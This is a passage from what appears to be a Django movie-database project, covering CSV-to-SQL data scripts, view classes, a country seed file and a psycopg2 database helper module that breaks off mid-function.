count_movie_not_found += 1\n print(\"Verified {} entries. OMDB matched {} movies. {} movies not found in their db.\".format(\n count_rows, count_movie_okay, count_movie_not_found\n ))\n\ndef test_movie_order_in_two_files():\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n assert(row1[6] == row2[0])\n assert(row1[14] == row2[1])\n\ndef get_countries():\n countries = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n countries.add(row1[2].strip())\n for c in omdb_data[\"Country\"].split(','):\n countries.add(c.strip())\n countries = sorted(countries)\n\n with open(\"countries.sql\", \"w\") as file:\n for country in countries:\n file.write(\"\"\"INSERT INTO country (\"name\") VALUES ('{}');\\n\"\"\".format(country))\n\ndef get_mpaa_ratings():\n mpaa_ratings = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n mpaa_ratings.add(row1[7].strip())\n for c in omdb_data[\"Rated\"].split(','):\n mpaa_ratings.add(c.strip())\n mpaa_ratings = sorted(mpaa_ratings)\n\n unrated_equivalents = [\"N/A\", \"NOT RATED\", \"Not specified\"]\n for x in unrated_equivalents:\n if x in mpaa_ratings:\n mpaa_ratings.remove(x)\n\n with open(\"ratings.sql\", \"w\") as file:\n for mpaa_rating in mpaa_ratings:\n file.write(\"\"\"INSERT INTO rating (\"name\") VALUES ('{}');\\n\"\"\".format(mpaa_rating))\n file.write(\"\\n-- {} are all replaced with UNRATED\\n\".format(unrated_equivalents))\n\ndef get_languages():\n languages = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n for c in omdb_data[\"Language\"].split(','):\n languages.add(c.strip())\n languages = sorted(languages)\n\n with open(\"languages.sql\", \"w\") as file:\n for language in languages:\n file.write(\"\"\"INSERT INTO language (\"name\") VALUES ('{}');\\n\"\"\".format(language))\n\ndef get_genres():\n genres = set()\n with open(\"movies.csv\") as f1:\n with open(\"movies_with_omdb.csv\") as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for row1, row2 in rows:\n omdb_data = ast.literal_eval(row2[2])\n if omdb_data[\"Response\"] == \"False\":\n continue\n genres.add(row1[4].strip())\n for c in omdb_data[\"Genre\"].split(','):\n genres.add(c.strip())\n genres = sorted(genres)\n\n with open(\"genres.sql\", \"w\") as file:\n for genre in genres:\n file.write(\"\"\"INSERT INTO genre (\"name\") VALUES ('{}');\\n\"\"\".format(genre))\n\nif __name__=='__main__':\n test_omdb_data_integrity()\n test_movie_order_in_two_files()\n get_countries()\n get_mpaa_ratings()\n get_languages()\n get_genres()" }, { "alpha_fraction": 0.688524603843689, "alphanum_fraction": 0.688524603843689, "avg_line_length": 23.600000381469727, "blob_id": "0822dd384d9f07e3d79e623342541e345eb03857", "content_id": "593d8c0ec64d73050dd54235ec472fd9e4338916", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/data/credentials.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "class DatabaseCredentials:\n\tdbname = 'your db name'\n\tuser = 'your db user'\n\thost = 'your db host'\n\tpassword = 'your password'" }, { "alpha_fraction": 0.39534884691238403, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 13.333333015441895, "blob_id": "e2481fa3687a6565b9d5c19fcd933689c67b2b87", "content_id": "26c156e464a94adcaeae5260dbd024532834446d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 43, "license_type": "no_license", "max_line_length": 15, "num_lines": 3, "path": "/requirements.txt", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "Django==2.1.2\npsycopg2==2.7.5\npytz==2018.5\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.5306756496429443, "avg_line_length": 40.41469955444336, "blob_id": "952fbb0b28da4aeb6c70fc17f751528edd4ee194", "content_id": "cb5fe9217742027980d7653779d2b51fa7fa6dbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15778, "license_type": "no_license", "max_line_length": 151, "num_lines": 381, "path": "/justmovies/views.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "from django.http import HttpResponseRedirect\nfrom django.views import View\nfrom django.shortcuts import render\n\nfrom utils.db_utils import DatabaseUtils\nfrom utils.enums import Enums\n\n\nclass MoviesView(View):\n def get(self, request):\n db = DatabaseUtils()\n\n filters = {\n \"title\": request.GET.get('title', ''),\n \"company\": request.GET.get('company', ''),\n \"year_gte\": request.GET.get('year_gte', ''),\n \"year_lte\": request.GET.get('year_lte', ''),\n \"imdb_rating\": request.GET.get('imdb_rating', '')\n }\n\n movies = db.get_movies(filters, page_number=int(request.GET.get('page', '1')))\n\n pagination = {\n \"page_number\": movies[\"pagination\"][\"page_number\"],\n \"page_size\": movies[\"pagination\"][\"page_size\"],\n \"total_hits\": movies[\"pagination\"][\"total_hits\"],\n \"total_pages\": movies[\"pagination\"][\"total_pages\"],\n \"pages\": None\n }\n\n pages = [\n i for i in range(1, movies[\"pagination\"][\"total_pages\"] + 1)\n if abs(movies[\"pagination\"][\"page_number\"] - i) <= 4\n ]\n\n if len(pages):\n if pages[0] != 1:\n pages = ['...'] + pages\n\n if pages[-1] != movies[\"pagination\"][\"total_pages\"]:\n pages = pages + ['...']\n\n pagination[\"pages\"] = pages\n\n context = {\n \"filters\": filters,\n \"movies\": [{\n \"pk\": m[0],\n \"title\": m[1],\n \"year\": m[2],\n \"company\": m[3],\n \"budget\": m[4],\n \"gross\": m[5],\n \"released\": m[6],\n \"runtime\": m[7],\n \"plot\": m[8],\n \"awards\": m[9],\n \"poster\": m[10],\n \"website\": m[11],\n \"imdb_rating\": m[12],\n \"imdb_id\": m[13],\n \"country\": m[14],\n \"rating\": m[15],\n \"genre\": m[16],\n \"language\": m[17]\n } for m in movies[\"values\"]],\n \"pagination\": pagination,\n \"ratings\": Enums.imdb_ratings\n }\n return render(request, 'justmovies/index.html', context)\n\n\nclass MovieEditView(View):\n def get_context_data(self, movie_pk):\n db = DatabaseUtils()\n movie = db.get_movie_from_pk(movie_pk)\n context = {\n \"movie\": {\n \"pk\": movie[0],\n \"title\": movie[1],\n \"year\": movie[2],\n \"company\": movie[3],\n \"budget\": movie[4],\n \"gross\": movie[5],\n \"released\": movie[6],\n \"runtime\": movie[7],\n \"plot\": movie[8],\n \"awards\": movie[9],\n \"poster\": movie[10],\n \"website\": movie[11],\n \"imdb_rating\": movie[12],\n \"imdb_id\": movie[13],\n \"country\": movie[14],\n \"rating\": movie[15],\n \"genre\": movie[16],\n \"language\": movie[17]\n },\n \"countries\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.countries],\n \"ratings\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.mpaa_ratings],\n \"genres\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.genres],\n \"languages\": [{\n \"pk\": c[0],\n \"name\": c[1]\n } for c in db.languages]\n }\n return context\n\n def get(self, request, movie_pk):\n return render(request, 'justmovies/movie_edit.html', self.get_context_data(movie_pk))\n\n def post(self, request, movie_pk):\n db = DatabaseUtils()\n if request.POST.get(\"action\", \"update\") == \"delete\":\n db.delete_movie(movie_pk)\n return HttpResponseRedirect('/')\n\n db.update_movie(movie_pk, {\n \"title\": request.POST.get(\"title\", \"\"),\n \"year\": request.POST.get(\"year\", \"\"),\n \"company\": request.POST.get(\"company\", \"\"),\n \"budget\": request.POST.get(\"budget\", \"\"),\n \"gross\": request.POST.get(\"gross\", \"\"),\n \"released\": request.POST.get(\"released\", \"\"),\n \"runtime\": request.POST.get(\"runtime\", \"\"),\n \"plot\": request.POST.get(\"plot\", \"\"),\n \"awards\": request.POST.get(\"awards\", \"\"),\n \"poster\": request.POST.get(\"poster\", \"\"),\n \"website\": request.POST.get(\"website\", \"\"),\n \"imdb_rating\": request.POST.get(\"imdb_rating\", \"\"),\n \"imdb_id\": request.POST.get(\"imdb_id\", \"\"),\n \"country\": request.POST.get(\"country\", \"\"),\n \"rating\": request.POST.get(\"rating\", \"\"),\n \"genre\": request.POST.get(\"genre\", \"\"),\n \"language\": request.POST.get(\"language\", \"\")\n })\n return render(request, 'justmovies/movie_edit.html', self.get_context_data(movie_pk))\n\n\nclass PeopleView(View):\n def get(self, request):\n db = DatabaseUtils()\n name = request.GET.get('name', 'Stephen King')\n\n if not name:\n return render(request, 'justmovies/people.html', {\"success\": False})\n\n person = db.get_people(name)\n\n if not person:\n return render(request, 'justmovies/people.html', {\"success\": False, \"name\": name})\n\n person = person[0]\n\n roles = db.get_personal_roles(person)\n roles = ', '.join([r[1] for r in roles])\n\n involvements = db.get_involvements(person)\n involvements = [{\n \"movie_pk\": i[0],\n \"title\": i[1],\n \"year\": i[2],\n \"awards\": i[9],\n \"poster\": i[10],\n \"role\": i[18]\n } for i in involvements]\n\n context = {\n \"success\": True,\n \"name\": person[1],\n \"dob\": person[2],\n \"image\": person[3],\n \"intro\": person[4],\n \"roles\": roles,\n \"involvements\": involvements,\n }\n return render(request, 'justmovies/people.html', context)\n\n\nclass DataView(View):\n def get(self, request):\n db = DatabaseUtils()\n cursor = db.get_cursor()\n\n cursor.execute(\"SELECT COUNT(*), MIN(year), MAX(year), SUM(budget) FROM movie;\")\n moviesGeneral = cursor.fetchone()\n\n cursor.execute(\"SELECT COUNT(*) FROM person;\")\n peopleGeneral = cursor.fetchone()\n\n general = {\n \"moviesCount\": moviesGeneral[0],\n \"moviesMinYear\": moviesGeneral[1],\n \"moviesMaxYear\": moviesGeneral[2],\n \"moviesBudget\": moviesGeneral[3] // 1000000,\n \"totalPeople\": peopleGeneral[0],\n \"totalReviews\": 0,\n }\n\n # DISTRIBUTION BY GENRE\n cursor.execute(\"select g.name, count(*) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) limit 8;\")\n countDistByGenre = cursor.fetchall()\n cursor.execute(\"select count(*) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) offset 8;\")\n remainingGenres = cursor.fetchall()\n remainingGenres = sum([r[0] for r in remainingGenres])\n countDistByGenre = {\n \"datasets\": [{\n \"data\": [g[1] for g in countDistByGenre] + [remainingGenres],\n \"backgroundColor\": Enums.colors[:len(countDistByGenre)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in countDistByGenre] + [\"Others\"]\n }\n\n # DISTRIBUTION BY COUNTRY\n cursor.execute(\"select c.name, count(*) from movie m join country c on m.country = c.pk group by c.name order by -count(*) limit 5;\")\n countDistByCountry = cursor.fetchall()\n cursor.execute(\"select count(*) from movie m join country c on m.country = c.pk group by c.name order by -count(*) offset 5;\")\n remainingCountries = cursor.fetchall()\n remainingCountries = sum([r[0] for r in remainingCountries])\n countDistByCountry = {\n \"datasets\": [{\n \"data\": [g[1] for g in countDistByCountry] + [remainingCountries],\n \"backgroundColor\": Enums.colors[:len(countDistByCountry)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in countDistByCountry] + [\"Others\"]\n }\n\n # DISTRIBUTION BY LANGUAGE\n cursor.execute(\"select c.name, count(*) from movie m join language c on m.language = c.pk group by c.name order by -count(*) limit 5;\")\n countDistByLanguage = cursor.fetchall()\n cursor.execute(\"select count(*) from movie m join language c on m.language = c.pk group by c.name order by -count(*) offset 5;\")\n remainingLanguages = cursor.fetchall()\n remainingLanguages = sum([r[0] for r in remainingLanguages])\n countDistByLanguage = {\n \"datasets\": [{\n \"data\": [g[1] for g in countDistByLanguage] + [remainingLanguages],\n \"backgroundColor\": Enums.colors[:len(countDistByLanguage)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in countDistByLanguage] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY GENRE\n cursor.execute(\"select g.name, sum(budget) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) limit 8;\")\n budgetDistByGenre = cursor.fetchall()\n cursor.execute(\"select sum(budget) from movie m join genre g on m.genre = g.pk group by g.name order by -count(*) offset 8;\")\n remainingGenres = cursor.fetchall()\n remainingGenres = sum([r[0] for r in remainingGenres])\n budgetDistByGenre = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByGenre] + [remainingGenres],\n \"backgroundColor\": Enums.colors[:len(budgetDistByGenre)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in budgetDistByGenre] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY COUNTRY\n cursor.execute(\"select c.name, sum(budget) from movie m join country c on m.country = c.pk group by c.name order by -count(*) limit 5;\")\n budgetDistByCountry = cursor.fetchall()\n cursor.execute(\"select sum(budget) from movie m join country c on m.country = c.pk group by c.name order by -count(*) offset 5;\")\n remainingCountries = cursor.fetchall()\n remainingCountries = sum([r[0] for r in remainingCountries])\n budgetDistByCountry = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByCountry] + [remainingCountries],\n \"backgroundColor\": Enums.colors[:len(budgetDistByCountry)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in budgetDistByCountry] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY LANGUAGE\n cursor.execute(\"select c.name, sum(budget) from movie m join language c on m.language = c.pk group by c.name order by -count(*) limit 5;\")\n budgetDistByLanguage = cursor.fetchall()\n cursor.execute(\"select sum(budget) from movie m join language c on m.language = c.pk group by c.name order by -count(*) offset 5;\")\n remainingLanguages = cursor.fetchall()\n remainingLanguages = sum([r[0] for r in remainingLanguages])\n budgetDistByLanguage = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByLanguage] + [remainingLanguages],\n \"backgroundColor\": Enums.colors[:len(budgetDistByLanguage)] + [Enums.colors_others]\n }],\n \"labels\": [g[0] for g in budgetDistByLanguage] + [\"Others\"]\n }\n\n # BUDGET DISTRIBUTION BY YEAR\n cursor.execute(\"select year, avg(budget)::numeric::integer from movie group by year order by year;\")\n budgetDistByYear = cursor.fetchall()\n budgetDistByYear = {\n \"datasets\": [{\n \"data\": [g[1] for g in budgetDistByYear],\n \"backgroundColor\": Enums.colors[:len(budgetDistByYear)]\n }],\n \"labels\": [g[0] for g in budgetDistByYear]\n }\n print(budgetDistByYear)\n\n # ROLES DISTRIBUTION\n cursor.execute(\"SELECT count(person.pk), role FROM person JOIN personal_role ON person.pk = personal_role.person group by personal_role.role;\")\n celebrityRoleDistribution = cursor.fetchall()\n celebrityRoleDistribution = [{\n \"sets\": [c[1]],\n \"size\": c[0]\n } for c in celebrityRoleDistribution]\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Writer') and \"\n \"person.pk in (select person from involvement where role='Actor');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Writer\", \"Actor\"],\n \"size\": result[0]\n })\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Director') and \"\n \"person.pk in (select person from involvement where role='Actor');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Director\", \"Actor\"],\n \"size\": result[0]\n })\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Writer') and \"\n \"person.pk in (select person from involvement where role='Director');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Writer\", \"Director\"],\n \"size\": result[0]\n })\n cursor.execute(\"select count(*) from person where \"\n \"person.pk in (select person from involvement where role='Writer') and \"\n \"person.pk in (select person from involvement where role='Director') and \"\n \"person.pk in (select person from involvement where role='Actor');\")\n result = cursor.fetchone()\n celebrityRoleDistribution.append({\n \"sets\": [\"Writer\", \"Actor\", \"Director\"],\n \"size\": result[0]\n })\n\n # TOP RATED CELEBRITIES\n cursor.execute(\"\"\"\n select\n ip.name,\n avg(NULLIF(imdb_rating, 'N/A') :: float) as avg_rating,\n count(*) as movie_count\n from movie m\n join (select\n p.name,\n i.movie\n from person p\n join involvement i on p.pk = i.person) ip on ip.movie = m.pk\n group by ip.name\n having count(*) >= 10\n order by -avg(NULLIF(imdb_rating, 'N/A') :: float)\n limit 10;\n \"\"\")\n topRatedCelebrities = cursor.fetchall()\n topRatedCelebrities = [{\n \"name\": t[0],\n \"avg_rating\": '{0:.2f}'.format(t[1]),\n \"movie_count\": t[2]\n } for t in topRatedCelebrities]\n\n context = {\n \"general\": general,\n \"countDistByGenre\": countDistByGenre,\n \"countDistByCountry\": countDistByCountry,\n \"countDistByLanguage\": countDistByLanguage,\n \"budgetDistByGenre\": budgetDistByGenre,\n \"budgetDistByCountry\": budgetDistByCountry,\n \"budgetDistByLanguage\": budgetDistByLanguage,\n \"budgetDistByYear\": budgetDistByYear,\n \"celebrityRoleDistribution\": celebrityRoleDistribution,\n \"topRatedCelebrities\": topRatedCelebrities\n }\n return render(request, 'justmovies/data.html', context)" }, { "alpha_fraction": 0.6962617039680481, "alphanum_fraction": 0.6962617039680481, "avg_line_length": 49.085105895996094, "blob_id": "6ff248f8ef9f1907f41843bed3ba65f91ab5e536", "content_id": "c115852b1441bf9d42b05625d19cf9bf5aba72de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 4708, "license_type": "no_license", "max_line_length": 71, "num_lines": 94, "path": "/data/countries.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "INSERT INTO country (\"name\") VALUES ('Albania');\nINSERT INTO country (\"name\") VALUES ('Angola');\nINSERT INTO country (\"name\") VALUES ('Argentina');\nINSERT INTO country (\"name\") VALUES ('Aruba');\nINSERT INTO country (\"name\") VALUES ('Australia');\nINSERT INTO country (\"name\") VALUES ('Austria');\nINSERT INTO country (\"name\") VALUES ('Bahamas');\nINSERT INTO country (\"name\") VALUES ('Belgium');\nINSERT INTO country (\"name\") VALUES ('Bosnia and Herzegovina');\nINSERT INTO country (\"name\") VALUES ('Botswana');\nINSERT INTO country (\"name\") VALUES ('Brazil');\nINSERT INTO country (\"name\") VALUES ('Bulgaria');\nINSERT INTO country (\"name\") VALUES ('Burkina Faso');\nINSERT INTO country (\"name\") VALUES ('Cambodia');\nINSERT INTO country (\"name\") VALUES ('Cameroon');\nINSERT INTO country (\"name\") VALUES ('Canada');\nINSERT INTO country (\"name\") VALUES ('Chile');\nINSERT INTO country (\"name\") VALUES ('China');\nINSERT INTO country (\"name\") VALUES ('Colombia');\nINSERT INTO country (\"name\") VALUES ('Croatia');\nINSERT INTO country (\"name\") VALUES ('Cuba');\nINSERT INTO country (\"name\") VALUES ('Czech Republic');\nINSERT INTO country (\"name\") VALUES ('Denmark');\nINSERT INTO country (\"name\") VALUES ('Ecuador');\nINSERT INTO country (\"name\") VALUES ('Federal Republic of Yugoslavia');\nINSERT INTO country (\"name\") VALUES ('Finland');\nINSERT INTO country (\"name\") VALUES ('France');\nINSERT INTO country (\"name\") VALUES ('Germany');\nINSERT INTO country (\"name\") VALUES ('Ghana');\nINSERT INTO country (\"name\") VALUES ('Greece');\nINSERT INTO country (\"name\") VALUES ('Hong Kong');\nINSERT INTO country (\"name\") VALUES ('Hungary');\nINSERT INTO country (\"name\") VALUES ('Iceland');\nINSERT INTO country (\"name\") VALUES ('India');\nINSERT INTO country (\"name\") VALUES ('Indonesia');\nINSERT INTO country (\"name\") VALUES ('Iran');\nINSERT INTO country (\"name\") VALUES ('Iraq');\nINSERT INTO country (\"name\") VALUES ('Ireland');\nINSERT INTO country (\"name\") VALUES ('Isle Of Man');\nINSERT INTO country (\"name\") VALUES ('Israel');\nINSERT INTO country (\"name\") VALUES ('Italy');\nINSERT INTO country (\"name\") VALUES ('Jamaica');\nINSERT INTO country (\"name\") VALUES ('Japan');\nINSERT INTO country (\"name\") VALUES ('Jordan');\nINSERT INTO country (\"name\") VALUES ('Kazakhstan');\nINSERT INTO country (\"name\") VALUES ('Kenya');\nINSERT INTO country (\"name\") VALUES ('Latvia');\nINSERT INTO country (\"name\") VALUES ('Lebanon');\nINSERT INTO country (\"name\") VALUES ('Liechtenstein');\nINSERT INTO country (\"name\") VALUES ('Lithuania');\nINSERT INTO country (\"name\") VALUES ('Luxembourg');\nINSERT INTO country (\"name\") VALUES ('Malta');\nINSERT INTO country (\"name\") VALUES ('Mexico');\nINSERT INTO country (\"name\") VALUES ('Monaco');\nINSERT INTO country (\"name\") VALUES ('Morocco');\nINSERT INTO country (\"name\") VALUES ('Netherlands');\nINSERT INTO country (\"name\") VALUES ('New Zealand');\nINSERT INTO country (\"name\") VALUES ('Norway');\nINSERT INTO country (\"name\") VALUES ('Palestine');\nINSERT INTO country (\"name\") VALUES ('Panama');\nINSERT INTO country (\"name\") VALUES ('Paraguay');\nINSERT INTO country (\"name\") VALUES ('Peru');\nINSERT INTO country (\"name\") VALUES ('Philippines');\nINSERT INTO country (\"name\") VALUES ('Poland');\nINSERT INTO country (\"name\") VALUES ('Portugal');\nINSERT INTO country (\"name\") VALUES ('Qatar');\nINSERT INTO country (\"name\") VALUES ('Republic of Macedonia');\nINSERT INTO country (\"name\") VALUES ('Romania');\nINSERT INTO country (\"name\") VALUES ('Russia');\nINSERT INTO country (\"name\") VALUES ('Saudi Arabia');\nINSERT INTO country (\"name\") VALUES ('Serbia');\nINSERT INTO country (\"name\") VALUES ('Singapore');\nINSERT INTO country (\"name\") VALUES ('Slovakia');\nINSERT INTO country (\"name\") VALUES ('Slovenia');\nINSERT INTO country (\"name\") VALUES ('South Africa');\nINSERT INTO country (\"name\") VALUES ('South Korea');\nINSERT INTO country (\"name\") VALUES ('Soviet Union');\nINSERT INTO country (\"name\") VALUES ('Spain');\nINSERT INTO country (\"name\") VALUES ('Sweden');\nINSERT INTO country (\"name\") VALUES ('Switzerland');\nINSERT INTO country (\"name\") VALUES ('Taiwan');\nINSERT INTO country (\"name\") VALUES ('Thailand');\nINSERT INTO country (\"name\") VALUES ('Tunisia');\nINSERT INTO country (\"name\") VALUES ('Turkey');\nINSERT INTO country (\"name\") VALUES ('UK');\nINSERT INTO country (\"name\") VALUES ('USA');\nINSERT INTO country (\"name\") VALUES ('Ukraine');\nINSERT INTO country (\"name\") VALUES ('United Arab Emirates');\nINSERT INTO country (\"name\") VALUES ('Uruguay');\nINSERT INTO country (\"name\") VALUES ('Venezuela');\nINSERT INTO country (\"name\") VALUES ('Vietnam');\nINSERT INTO country (\"name\") VALUES ('West Germany');\nINSERT INTO country (\"name\") VALUES ('Yugoslavia');\nINSERT INTO country (\"name\") VALUES ('Zimbabwe');\n" }, { "alpha_fraction": 0.5694145560264587, "alphanum_fraction": 0.5738269686698914, "avg_line_length": 34.87644958496094, "blob_id": "e1300a00a6c4fc0359d77944e8c835317582caf7", "content_id": "4381270f02c718de37503aaf4e35bd4fcb13df11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9292, "license_type": "no_license", "max_line_length": 148, "num_lines": 259, "path": "/utils/db_utils.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import psycopg2\nfrom psycopg2 import sql\nimport sys\nimport os.path\nfrom utils.credentials import DatabaseCredentials as dbc\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\n\nclass DatabaseUtils():\n cursor = None\n connection = None\n genres = []\n mpaa_ratings = []\n countries = []\n languages = []\n\n # CONSTRUCTOR\n def __init__(self):\n self.connection = psycopg2.connect(\"dbname='{0}' user='{1}' host='{2}' password='{3}'\".format(dbc.dbname, dbc.user, dbc.host, dbc.password))\n self.connection.set_client_encoding('UNICODE')\n\n # cursor to perform database operations\n self.cursor = self.connection.cursor()\n\n self.fetch_enums()\n\n # DESTRUCTOR\n def __del__(self):\n # close communication with the database\n self.cursor.close()\n self.connection.close()\n\n # MISC\n def commit(self):\n # make the changes to the database persistent\n self.connection.commit()\n\n def get_cursor(self):\n return self.cursor\n\n def get_connection(self):\n return self.connection\n\n def print_query(self, query):\n # just for debugging\n print(\"----------------------------------------------\")\n print(self.cursor.mogrify(query))\n print(\"----------------------------------------------\")\n\n def fetch_enums(self):\n # genres\n self.cursor.execute(\"SELECT * FROM genre;\")\n self.genres = self.cursor.fetchall()\n\n # mpaa_ratings\n self.cursor.execute(\"SELECT * FROM rating;\")\n self.mpaa_ratings = self.cursor.fetchall()\n\n # countries\n self.cursor.execute(\"SELECT * FROM country;\")\n self.countries = self.cursor.fetchall()\n\n # languages\n self.cursor.execute(\"SELECT * FROM language;\")\n self.languages = self.cursor.fetchall()\n\n # PEOPLE\n def get_person(self, name):\n query = sql.SQL(\"SELECT * FROM person WHERE name={0};\").format(\n sql.Literal(name)\n )\n self.cursor.execute(query)\n return self.cursor.fetchone()\n\n def get_people(self, name):\n query = sql.SQL(\"SELECT * FROM person WHERE name ilike {0};\").format(\n sql.Literal(\"%\" + name + \"%\")\n )\n self.cursor.execute(query)\n return self.cursor.fetchall()\n\n def insert_person(self, name, dob=None):\n if dob:\n query = sql.SQL(\"\"\"INSERT INTO person (\"name\", \"dob\") VALUES ({}, {});\"\"\").format(\n sql.Literal(name), sql.Literal(dob)\n )\n else:\n query = sql.SQL(\"\"\"INSERT INTO person (\"name\") VALUES ({});\"\"\").format(\n sql.Literal(name)\n )\n self.cursor.execute(query)\n\n def insert_then_get_person(self, name, dob=None):\n self.insert_person(name, dob)\n return self.get_person(name)\n\n # PERSONAL ROLES\n def get_personal_role(self, person_pk, role):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n query = \"\"\"SELECT * FROM personal_role WHERE person='{}' and role='{}';\"\"\".format(person_pk, role)\n self.cursor.execute(query)\n return self.cursor.fetchone()\n\n def get_personal_roles(self, person_pk):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n query = \"\"\"SELECT * FROM personal_role WHERE person='{}';\"\"\".format(person_pk)\n self.cursor.execute(query)\n return self.cursor.fetchall()\n\n def insert_role(self, person_pk, role):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n query = \"\"\"INSERT INTO personal_role (\"person\", \"role\") VALUES ('{}', '{}');\"\"\".format(person_pk, role)\n self.cursor.execute(query)\n\n # MOVIES\n def get_movie(self, title, year):\n query = \"\"\"SELECT * FROM movie WHERE title=%s and year=%s;\"\"\"\n self.cursor.execute(query, (title, year))\n return self.cursor.fetchone()\n\n def get_movie_from_pk(self, movie_pk):\n query = \"\"\"SELECT * FROM movie WHERE pk=%s;\"\"\"\n self.cursor.execute(query, (movie_pk,))\n return self.cursor.fetchone()\n\n def get_movies(self, filters, page_number=1, page_size=20):\n limit = page_size\n offset = page_size * (page_number - 1)\n\n conditions = [sql.SQL(\"True\")]\n if \"title\" in filters and len(filters[\"title\"]):\n conditions.append(sql.SQL(\"title ilike {0} \").format(sql.Literal('%' + filters[\"title\"] + '%')))\n if \"company\" in filters and len(filters[\"company\"]):\n conditions.append(sql.SQL(\"company ilike {0} \").format(sql.Literal('%' + filters[\"company\"] + '%')))\n if \"year_gte\" in filters and len(filters[\"year_gte\"]):\n conditions.append(sql.SQL(\"year >= {0} \").format(sql.Literal(filters[\"year_gte\"])))\n if \"year_lte\" in filters and len(filters[\"year_lte\"]):\n conditions.append(sql.SQL(\"year <= {0} \").format(sql.Literal(filters[\"year_lte\"])))\n if \"imdb_rating\" in filters and len(filters[\"imdb_rating\"]):\n conditions.append(sql.SQL(\"imdb_rating >= {0} \").format(sql.Literal(filters[\"imdb_rating\"])))\n\n # let's first get the counts\n query = sql.SQL(\"SELECT count(*) FROM movie WHERE {0};\").format(\n sql.SQL(\" and \").join(conditions)\n )\n self.cursor.execute(query)\n total_hits = self.cursor.fetchone()[0]\n\n # now let's get the actual movies in the limit\n query = sql.SQL(\"SELECT * FROM movie WHERE {0} LIMIT {1} OFFSET {2};\").format(\n sql.SQL(\" and \").join(conditions), sql.Literal(limit), sql.Literal(offset)\n )\n self.cursor.execute(query)\n\n return {\n \"values\": self.cursor.fetchall(),\n \"pagination\": {\n \"page_number\": page_number,\n \"page_size\": page_size,\n \"total_hits\": total_hits,\n \"total_pages\": total_hits // page_size + 1\n }\n }\n\n def insert_movie(self, title, year, params={}):\n params[\"title\"] = title\n params[\"year\"] = year\n\n query = sql.SQL(\"INSERT INTO movie ({0}) VALUES ({1});\").format(\n sql.SQL(', ').join([sql.Identifier(value) for value in params.keys()]),\n sql.SQL(', ').join([sql.Literal(value) for value in params.values()])\n )\n self.cursor.execute(query)\n\n def insert_then_get_movie(self, title, year, params={}):\n self.insert_movie(title, year, params)\n return self.get_movie(title, year)\n\n def update_movie(self, movie_pk, params={}):\n query = sql.SQL(\"UPDATE movie SET {0} WHERE pk={1};\").format(\n sql.SQL(', ').join([sql.Identifier(key) + sql.SQL('=') + sql.Literal(params[key]) for key in params]),\n sql.Literal(movie_pk)\n )\n self.cursor.execute(query)\n self.commit()\n\n def delete_movie(self, movie_pk):\n query = sql.SQL(\"DELETE FROM movie WHERE pk={0};\").format(\n sql.Literal(movie_pk)\n )\n self.cursor.execute(query)\n self.commit()\n\n # INVOLVEMENTS\n def get_involvement(self, person_pk, 